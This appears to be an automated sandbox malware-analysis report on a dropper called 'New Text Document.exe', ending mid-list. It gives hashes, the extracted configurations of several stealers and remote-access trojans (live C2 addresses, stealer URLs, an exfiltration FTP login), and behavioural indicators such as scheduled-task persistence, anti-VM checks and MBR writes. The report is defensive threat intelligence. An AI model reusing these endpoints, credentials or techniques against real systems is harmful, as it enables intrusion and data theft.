Resubmissions
09-04-2024 13:27
240409-qqa5hsbd5t 1009-04-2024 13:27
240409-qp978abd5s 1009-04-2024 13:27
240409-qp9lpabd4y 1009-04-2024 13:27
240409-qp9axsgb32 1018-11-2023 14:44
231118-r4d9rsef94 10Analysis
-
max time kernel
272s -
max time network
455s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
09-04-2024 13:27
Static task
static1
Behavioral task
behavioral1
Sample
New Text Document.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
New Text Document.exe
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
New Text Document.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral4
Sample
New Text Document.exe
Resource
win11-20240221-en
General
-
Target
New Text Document.exe
-
Size
4KB
-
MD5
a239a27c2169af388d4f5be6b52f272c
-
SHA1
0feb9a0cd8c25f01d071e9b2cfc2ae7bd430318c
-
SHA256
98e895f711226a32bfab152e224279d859799243845c46e550c2d32153c619fc
-
SHA512
f30e1ff506cc4d729f7e24aa46e832938a5e21497f1f82f1b300d47f45dae7f1caef032237ef1f5ae9001195c43c0103e3ab787f9196c8397846c1dea8f351da
-
SSDEEP
48:6r1huik0xzYGJZZJOQOulbfSqXSfbNtm:IIxcLpf6zNt
Malware Config
Extracted
redline
6077866846
https://pastebin.com/raw/KE5Mft0T
Extracted
stealc
http://52.143.157.84
-
url_path
/c73eed764cc59dcb.php
Extracted
xworm
94.156.8.213:58002
127.0.0.1:18356
t-brave.gl.at.ply.gg:18356
-
Install_directory
%Public%
-
install_file
svchost.exe
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.siscop.com.co - Port:
21 - Username:
[email protected] - Password:
+5s48Ia2&-(t
Extracted
asyncrat
0.5.7B
Default
194.147.140.157:3361
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
true
-
install_file
msdtc.exe
-
install_folder
%AppData%
Extracted
socks5systemz
http://ckztaox.net/search/?q=67e28dd8685af379125bfd4e7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa49e8889b5e4fa9281ae978f271ea771795af8e05c645db22f31dfe339426fa11a366c350adb719a9577e55b8603e983a608ffd17c7ee93983d
http://ckztaox.net/search/?q=67e28dd8685af379125bfd4e7c27d78406abdd88be4b12eab517aa5c96bd86e8978249835a8bbc896c58e713bc90c91c36b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52bee348ee4c2b14a82966836f23d7f210c7ee979c3ccc699410
Extracted
lumma
https://appliedgrandyjuiw.shop/api
https://birdpenallitysydw.shop/api
https://cinemaclinicttanwk.shop/api
https://disagreemenywyws.shop/api
https://speedparticipatewo.shop/api
https://fixturewordbakewos.shop/api
https://colorprioritytubbew.shop/api
https://abuselinenaidwjuew.shop/api
https://methodgreenglassdatw.shop/api
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
DcRat 50 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
description ioc pid Process 4772 schtasks.exe 4980 schtasks.exe Key created \REGISTRY\MACHINE\Software\Microsoft\SystemCertificates\Root New Text Document.exe 1464 schtasks.exe 1552 schtasks.exe 1780 schtasks.exe 5020 schtasks.exe 2316 schtasks.exe 3984 schtasks.exe 4776 schtasks.exe 1832 schtasks.exe 688 schtasks.exe 3304 schtasks.exe 2452 schtasks.exe 3508 schtasks.exe 408 schtasks.exe 4772 schtasks.exe 5444 schtasks.exe 4876 schtasks.exe 2820 schtasks.exe 5580 schtasks.exe 1660 schtasks.exe 792 schtasks.exe 4496 schtasks.exe 600 schtasks.exe 3972 schtasks.exe 888 schtasks.exe 1552 schtasks.exe 2456 schtasks.exe 1700 schtasks.exe 4496 schtasks.exe 4312 schtasks.exe 2260 schtasks.exe 716 schtasks.exe 5036 schtasks.exe 5248 schtasks.exe 3100 schtasks.exe 1932 schtasks.exe 5108 schtasks.exe 4876 schtasks.exe 372 schtasks.exe 3288 schtasks.exe 5592 schtasks.exe 1636 schtasks.exe 5532 schtasks.exe 3760 schtasks.exe 5108 schtasks.exe 2988 schtasks.exe 1532 schtasks.exe 3504 schtasks.exe -
Detect Xworm Payload 5 IoCs
resource yara_rule behavioral2/files/0x000700000001ac7c-144.dat family_xworm behavioral2/memory/4644-145-0x0000000000EF0000-0x0000000000F06000-memory.dmp family_xworm behavioral2/files/0x000300000001526b-178.dat family_xworm behavioral2/memory/3804-184-0x00000000003B0000-0x00000000003C6000-memory.dmp family_xworm behavioral2/files/0x000d00000001ad3f-4132.dat family_xworm -
Gh0st RAT payload 4 IoCs
resource yara_rule behavioral2/memory/5008-1816-0x0000000010000000-0x0000000010362000-memory.dmp family_gh0strat behavioral2/memory/5008-1814-0x0000000010000000-0x0000000010362000-memory.dmp family_gh0strat behavioral2/memory/2100-1854-0x0000000010000000-0x0000000010362000-memory.dmp family_gh0strat behavioral2/memory/1380-1870-0x0000000010000000-0x0000000010362000-memory.dmp family_gh0strat -
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\ProgramData\\Samsung\\svdhost.exe\",\"C:\\Users\\Admin\\AppData\\Roaming\\Fsdisk\\Moderax\\svdhost.exe\",\"C:\\Users\\Admin\\AppData\\Roaming\\Alexa\\Virtual\\hostcls.exe\"" nds.exe -
Process spawned unexpected child process 36 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4496 1696 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2456 1696 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1464 1696 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1660 1696 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3760 1696 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1636 1696 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5036 1696 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1832 1696 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 888 1696 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 600 1696 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4772 1696 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2452 1696 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3972 1696 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3984 1696 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3100 1696 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5108 1696 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2988 1696 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4876 1696 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 716 1696 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2316 1696 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4312 1696 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3508 1696 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2260 1696 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4980 1696 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2820 1696 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3304 1696 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 408 1696 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 792 1696 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1552 1696 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1780 1696 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 688 1696 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5108 1696 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1700 1696 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4876 1696 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4496 1696 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3288 1696 schtasks.exe 81 -
Quasar payload 2 IoCs
resource yara_rule behavioral2/files/0x000700000001ad3a-2451.dat family_quasar behavioral2/files/0x000700000001ae51-4194.dat family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral2/memory/4400-42-0x00000000009B0000-0x00000000009D2000-memory.dmp family_redline -
Socks5Systemz
Socks5Systemz is a botnet written in C++.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" garits.exe -
resource yara_rule behavioral2/files/0x000700000001acf6-2244.dat dcrat -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ mQxBvlTA.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ sarra.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sarra.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sarra.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion mQxBvlTA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion mQxBvlTA.exe -
Drops startup file 4 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\garits.exe Powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\garits.exe Powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start.vbs powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start.vbs powershell.exe -
Executes dropped EXE 64 IoCs
pid Process 3932 mQxBvlTA.exe 3904 xIPJVPDq.exe 1532 XNuTnwMo.exe 4400 crypted6077866846MVYQY.exe 3848 i1gcbW1E.exe 4180 wininit.exe 2984 1234.exe 3160 ISetup8.exe 5068 test2.exe 4900 u2fs.0.exe 4116 1111.exe 4876 ISetup2.exe 5100 Tester.exe 4644 svchost.exe 1544 555.exe 4508 Document.exe 3804 BrawlB0t.exe 2764 medcallaboratory5.exe 2132 securitycheck.exe 4808 svchost.exe 4332 PrintSpoofer.exe 1812 svchost.exe 1572 Document.exe 1904 msdtc.exe 4276 Retailer_prog.exe 5012 BroomSetup.exe 1620 msdtc.exe 4220 OneDrive.exe 4176 syncUpd.exe 4296 Ledger-Live.exe 4984 1111.exe 2240 new1.exe 276 swiiii.exe 940 ISetup5.exe 5068 uq4.0.exe 196 OneDrive.exe 5084 uq4.1.exe 5008 mstsc.exe 2100 Jufrxnb.exe 1380 Jufrxnb.exe 4548 Jufrxnb.exe 1888 crypted_097f1784.exe 4420 june.exe 1428 june.tmp 2020 sunvox32.exe 608 sunvox32.exe 3264 crypted_33cb9091.exe 3244 new.exe 496 ttt01.exe 1832 OneDrive.exe 3944 123p.exe 4876 IjerkOff.exe 1344 ISetup1.exe 2100 agentDllDhcp.exe 1904 New Text Document.exe 2820 dckuybanmlgp.exe 4692 u11c.0.exe 4384 diufhloadme.exe 3164 u11c.1.exe 4140 ghhjhjhsg.exe 1440 crypt.exe 3508 gfhgfgjgf.exe 432 Opera_109.0.5097.38_Autoupdate_x64.exe 5980 toolspub1.exe -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Wine sarra.exe -
Loads dropped DLL 23 IoCs
pid Process 692 RegAsm.exe 692 RegAsm.exe 1428 june.tmp 1428 june.tmp 1428 june.tmp 5380 nds.exe 5380 nds.exe 5380 nds.exe 5380 nds.exe 5380 nds.exe 5380 nds.exe 5380 nds.exe 5380 nds.exe 5380 nds.exe 5380 nds.exe 5380 nds.exe 5380 nds.exe 5380 nds.exe 5380 nds.exe 5380 nds.exe 5380 nds.exe 5380 nds.exe 5380 nds.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x000800000001ac67-6.dat themida behavioral2/memory/3932-30-0x0000000000E80000-0x0000000001F9C000-memory.dmp themida behavioral2/memory/3932-31-0x0000000000E80000-0x0000000001F9C000-memory.dmp themida -
resource yara_rule behavioral2/memory/5008-1810-0x0000000010000000-0x0000000010362000-memory.dmp upx behavioral2/memory/5008-1816-0x0000000010000000-0x0000000010362000-memory.dmp upx behavioral2/memory/5008-1814-0x0000000010000000-0x0000000010362000-memory.dmp upx behavioral2/memory/2100-1850-0x0000000010000000-0x0000000010362000-memory.dmp upx behavioral2/memory/2100-1854-0x0000000010000000-0x0000000010362000-memory.dmp upx behavioral2/memory/1380-1862-0x0000000010000000-0x0000000010362000-memory.dmp upx behavioral2/memory/1380-1870-0x0000000010000000-0x0000000010362000-memory.dmp upx -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 45.155.250.90 -
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mQxBvlTA.exe -
Enumerates connected drives 3 TTPs 22 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\H: Jufrxnb.exe File opened (read-only) \??\N: Jufrxnb.exe File opened (read-only) \??\Q: Jufrxnb.exe File opened (read-only) \??\I: Jufrxnb.exe File opened (read-only) \??\J: Jufrxnb.exe File opened (read-only) \??\K: Jufrxnb.exe File opened (read-only) \??\L: Jufrxnb.exe File opened (read-only) \??\U: Jufrxnb.exe File opened (read-only) \??\V: Jufrxnb.exe File opened (read-only) \??\Y: Jufrxnb.exe File opened (read-only) \??\B: Jufrxnb.exe File opened (read-only) \??\M: Jufrxnb.exe File opened (read-only) \??\O: Jufrxnb.exe File opened (read-only) \??\P: Jufrxnb.exe File opened (read-only) \??\T: Jufrxnb.exe File opened (read-only) \??\W: Jufrxnb.exe File opened (read-only) \??\X: Jufrxnb.exe File opened (read-only) \??\E: Jufrxnb.exe File opened (read-only) \??\G: Jufrxnb.exe File opened (read-only) \??\R: Jufrxnb.exe File opened (read-only) \??\S: Jufrxnb.exe File opened (read-only) \??\Z: Jufrxnb.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 9 raw.githubusercontent.com 10 raw.githubusercontent.com 16 pastebin.com 19 pastebin.com 332 pastebin.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 67 ip-api.com 547 api.myip.com -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 ttt01.exe -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000700000001ac6c-64.dat autoit_exe behavioral2/files/0x0005000000015272-287.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3932 mQxBvlTA.exe 5732 sarra.exe -
Suspicious use of SetThreadContext 13 IoCs
description pid Process procid_target PID 2764 set thread context of 1576 2764 medcallaboratory5.exe 106 PID 4508 set thread context of 1572 4508 Document.exe 128 PID 1904 set thread context of 1620 1904 msdtc.exe 146 PID 276 set thread context of 692 276 swiiii.exe 160 PID 1888 set thread context of 4636 1888 crypted_097f1784.exe 173 PID 3264 set thread context of 2020 3264 crypted_33cb9091.exe 181 PID 3244 set thread context of 4640 3244 new.exe 188 PID 2820 set thread context of 3100 2820 dckuybanmlgp.exe 261 PID 2820 set thread context of 4484 2820 dckuybanmlgp.exe 264 PID 4384 set thread context of 2260 4384 diufhloadme.exe 269 PID 6060 set thread context of 5144 6060 crypted_69a30000.exe 297 PID 1700 set thread context of 6020 1700 powershell.exe 299 PID 6084 set thread context of 5960 6084 grhgjhjh.exe 309 -
Drops file in Program Files directory 11 IoCs
description ioc Process File created C:\Program Files\Microsoft Office 15\ClientX64\ee201eac4591f0 agentDllDhcp.exe File created C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe mstsc.exe File created C:\Program Files (x86)\Google\Temp\explorer.exe agentDllDhcp.exe File opened for modification C:\Program Files (x86)\Google\Temp\explorer.exe agentDllDhcp.exe File created C:\Program Files\Windows Security\BrowserCore\en-US\New Text Document.exe agentDllDhcp.exe File created C:\Program Files\Windows Security\BrowserCore\en-US\89b67648dd0106 agentDllDhcp.exe File created C:\Program Files\Microsoft Office\PackageManifests\Retailer_prog.exe agentDllDhcp.exe File created C:\Program Files\Microsoft Office 15\ClientX64\WerFault.exe agentDllDhcp.exe File opened for modification C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe mstsc.exe File created C:\Program Files (x86)\Google\Temp\7a0fd90576e088 agentDllDhcp.exe File created C:\Program Files\Microsoft Office\PackageManifests\0c64d6689ece55 agentDllDhcp.exe -
Drops file in Windows directory 7 IoCs
description ioc Process File created C:\Windows\Vss\RuntimeBroker.exe agentDllDhcp.exe File created C:\Windows\Vss\9e8d7a4ca61bd9 agentDllDhcp.exe File created C:\Windows\Migration\WTR\june.tmp.exe agentDllDhcp.exe File created C:\Windows\Migration\WTR\1ef7de7b4d56ed agentDllDhcp.exe File created C:\Windows\diagnostics\scheduled\wininit.exe agentDllDhcp.exe File created C:\Windows\svchost.exe Tester.exe File opened for modification C:\Windows\svchost.exe Tester.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1584 sc.exe 1288 sc.exe 4460 sc.exe 5040 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
pid pid_target Process procid_target 1744 2764 WerFault.exe 103 2816 4984 WerFault.exe 154 3044 1888 WerFault.exe 171 1876 3264 WerFault.exe 179 -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI BroomSetup.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI uq4.1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI BroomSetup.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI BroomSetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI uq4.1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI uq4.1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u11c.1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u11c.1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u11c.1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub1.exe -
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString u2fs.0.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RegAsm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Jufrxnb.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 Jufrxnb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString Jufrxnb.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 u2fs.0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegAsm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jufrxnb.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2 Jufrxnb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Jufrxnb.exe -
Creates scheduled task(s) 1 TTPs 49 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2260 schtasks.exe 5532 schtasks.exe 2456 schtasks.exe 5036 schtasks.exe 4980 schtasks.exe 3504 schtasks.exe 1636 schtasks.exe 4772 schtasks.exe 2316 schtasks.exe 1832 schtasks.exe 3972 schtasks.exe 1700 schtasks.exe 2988 schtasks.exe 4876 schtasks.exe 1780 schtasks.exe 3288 schtasks.exe 5592 schtasks.exe 5580 schtasks.exe 888 schtasks.exe 1552 schtasks.exe 1552 schtasks.exe 5020 schtasks.exe 1464 schtasks.exe 2452 schtasks.exe 3984 schtasks.exe 688 schtasks.exe 5108 schtasks.exe 3508 schtasks.exe 2820 schtasks.exe 716 schtasks.exe 4776 schtasks.exe 4496 schtasks.exe 1660 schtasks.exe 1532 schtasks.exe 3760 schtasks.exe 1932 schtasks.exe 3304 schtasks.exe 408 schtasks.exe 372 schtasks.exe 4772 schtasks.exe 5108 schtasks.exe 4312 schtasks.exe 600 schtasks.exe 3100 schtasks.exe 792 schtasks.exe 4496 schtasks.exe 5248 schtasks.exe 4876 schtasks.exe 5444 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2688 timeout.exe -
Kills process with taskkill 1 IoCs
pid Process 5040 taskkill.exe -
Modifies data under HKEY_USERS 5 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum\Version = "7" Jufrxnb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum Jufrxnb.exe Key created \REGISTRY\USER\.DEFAULT\Software Jufrxnb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft Jufrxnb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie Jufrxnb.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings IjerkOff.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 new1.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 new1.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4320 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3904 xIPJVPDq.exe 3904 xIPJVPDq.exe 3904 xIPJVPDq.exe 3904 xIPJVPDq.exe 1532 XNuTnwMo.exe 1532 XNuTnwMo.exe 1532 XNuTnwMo.exe 1532 XNuTnwMo.exe 4400 crypted6077866846MVYQY.exe 4400 crypted6077866846MVYQY.exe 4400 crypted6077866846MVYQY.exe 4400 crypted6077866846MVYQY.exe 4400 crypted6077866846MVYQY.exe 4400 crypted6077866846MVYQY.exe 4400 crypted6077866846MVYQY.exe 4400 crypted6077866846MVYQY.exe 4900 u2fs.0.exe 4900 u2fs.0.exe 5100 Tester.exe 5100 Tester.exe 5100 Tester.exe 5100 Tester.exe 5100 Tester.exe 5100 Tester.exe 5100 Tester.exe 5100 Tester.exe 5100 Tester.exe 5100 Tester.exe 5100 Tester.exe 5100 Tester.exe 5100 Tester.exe 5100 Tester.exe 5100 Tester.exe 5100 Tester.exe 4036 powershell.exe 4036 powershell.exe 4036 powershell.exe 4036 powershell.exe 4300 powershell.exe 4300 powershell.exe 4300 powershell.exe 4300 powershell.exe 4860 powershell.exe 4860 powershell.exe 4860 powershell.exe 4860 powershell.exe 1576 RegSvcs.exe 1576 RegSvcs.exe 1576 RegSvcs.exe 2132 securitycheck.exe 4812 powershell.exe 4812 powershell.exe 4812 powershell.exe 4812 powershell.exe 968 powershell.exe 968 powershell.exe 968 powershell.exe 968 powershell.exe 5048 powershell.exe 5048 powershell.exe 5048 powershell.exe 5048 powershell.exe 4808 svchost.exe 4808 svchost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2304 New Text Document.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2764 medcallaboratory5.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
